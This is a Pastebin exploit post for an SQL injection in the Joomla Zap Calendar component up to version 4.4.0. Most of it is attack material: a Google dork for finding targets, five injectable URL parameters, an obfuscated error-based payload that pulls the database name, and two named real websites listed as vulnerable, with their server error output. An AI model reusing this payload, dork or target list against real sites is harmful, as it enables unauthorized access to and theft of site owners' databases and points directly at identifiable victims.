Advertisement
KingSkrupellos

Joomla ZCalendar Zap Calendar 4.4.0 SQL Injection

Feb 11th, 2019
119
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.75 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Joomla ZCalendar Zap Calendar 4.4.0 SQL Injection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 12/02/2019
  7. # Vendor Homepage : zcontent.net - zapcalendar.com
  8. # Software Download Link : zcontent.net/products/subscriptions
  9. # Software Information Link : extensions.joomla.org/extension/zap-calendar/
  10. zcontent.net/support/zapcalendar/
  11. # Software Version : 3 and 4 - 4.4.0 and previous versions.
  12. + Zap Calendar 4 is compatible only with Joomla version 3.x.
  13. + Zap Calendar 3 is compatible with Joomla versions 1.5, 1.6, 1.7 and 2.5.
  14. # Software Price : 49$ - 99$ - 139$
  15. # Tested On : Windows and Linux
  16. # Category : WebApps
  17. # Exploit Risk : Medium
  18. # Google Dorks : inurl:''/index.php?option=com_zcalendar''
  19. # Vulnerability Type : CWE-89 [ Improper Neutralization of
  20. Special Elements used in an SQL Command ('SQL Injection') ]
  21. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  22. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  23. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  24.  
  25. ####################################################################
  26.  
  27. # Description about Software :
  28. ***************************
  29. Zap Calendar is an advanced, native Joomla calendar featuring AJAX, RSS and
  30.  
  31. full iCalendar support. There are dozens of add-ons available for
  32.  
  33. Zap Calendar, making it a full-featured calendaring system for Joomla websites.
  34.  
  35. ####################################################################
  36.  
  37. # Impact :
  38. ***********
  39. * Joomla ZCalendar Zap Calendar 4.4.0 and other versions -
  40.  
  41. component for Joomla is prone to an SQL-injection vulnerability because it
  42.  
  43. fails to sufficiently sanitize user-supplied data before using it in an SQL query.
  44.  
  45. Exploiting this issue could allow an attacker to compromise the application,
  46.  
  47. access or modify data, or exploit latent vulnerabilities in the underlying database.
  48.  
  49. A remote attacker can send a specially crafted request to the vulnerable application
  50.  
  51. and execute arbitrary SQL commands in application`s database.
  52.  
  53. Further exploitation of this vulnerability may result in unauthorized data manipulation.
  54.  
  55. An attacker can exploit this issue using a browser.
  56.  
  57. ####################################################################
  58.  
  59. # SQL Injection Exploit :
  60. ***************************
  61. /index.php?option=com_zcalendar&task=view&vmode=e&eid=[SQL Injection]
  62.  
  63. /index.php?option=com_zcalendar&view=plugin&name=rsvp&task=rsvpform&user=&eid=[SQL Injection]
  64.  
  65. /index.php?view=calendar&viewid=[ID-NUMBER]&format=html&Itemid=[ID-NUMBER]&option=com_zcalendar&ajax=[SQL Injection]&tmpl=zcalendar&vmode=m
  66.  
  67. /index.php?option=com_zcalendar&Itemid=&ajax=[ID-NUMBER]&ctype=d&date=[YEAR]-[MONTH]-[DAY]&format=raw&id=[ID-NUMBER]&lang=en&limitstart=[SQL Injection]&view=calendar
  68.  
  69. /index.php?cat=[ID-NUMBER]&cat=[ID-NUMBER]&cat=[ID-NUMBER]&cat=[ID-NUMBER]&cat=[ID-NUMBER]&cat=[ID-NUMBER]&cat=[ID-NUMBER]&cat=[ID-NUMBER]&cat=[ID-NUMBER]&allcatmatch=[ID-NUMBER]&vmode=w&viewid=[ID-NUMBER]&view=calendar&date=[YEAR]-[MONTH]-[DAY]&format=html&Itemid=ID-NUMBER]&option=com_zcalendar&viewid=[SQL Injection]
  70.  
  71. # Example SQL Injection Exploit Payload :
  72. **********************************
  73. 1++aND(/*!00000sELeCT*/+0x30783331+/*!00000FrOM*/+(/*!00000SeLeCT*/+cOUNT(*),/*!00000CoNCaT*/((sELEcT(sELECT+/*!00000CoNCAt*/(cAST(dATABASE()+aS+cHAR),0x7e,0x496873616E53656e63616e))+fROM+iNFORMATION_sCHEMA.tABLES+wHERE+tABLE_sCHEMA=dATABASE()+lIMIT+0,1),fLOOR(rAND(0)*2))x+fROM+iNFORMATION_sCHEMA.tABLES+gROUP+bY+x)a)&format=raw
  74.  
  75. ####################################################################
  76.  
  77. # Example Vulnerable Sites :
  78. *************************
  79. [+] stdominicschool.net/index.php?view=calendar&viewid=1&format=
  80. html&Itemid=215&option=com_zcalendar&ajax=1&tmpl=zcalendar&vmode=m
  81.  
  82. [+] mail.hbaofmidga.com/index.php?cat=1&cat=2&cat=3&cat=5&cat=6&cat=7&cat=8&cat=9
  83. &cat=10&allcatmatch=0&vmode=w&viewid=1&view=calendar
  84. &date=2003-07-06&format=html&Itemid=117&option=com_zcalendar&viewid=1
  85.  
  86. ####################################################################
  87.  
  88. # Example SQL Database Error :
  89. ****************************
  90. Warning: Creating default object from empty value in
  91. /home4/stdom/public_html/libraries/joomla/registry/registry.php on line 421
  92.  
  93. Deprecated: Non-static method JSite::getMenu() should not be called statically,
  94. assuming $this from incompatible context in /home/hbaadmin
  95. /public_html/components/com_zcalendar/views/calendar/view.html.php on line 112
  96.  
  97. ####################################################################
  98.  
  99. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  100.  
  101. ####################################################################
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement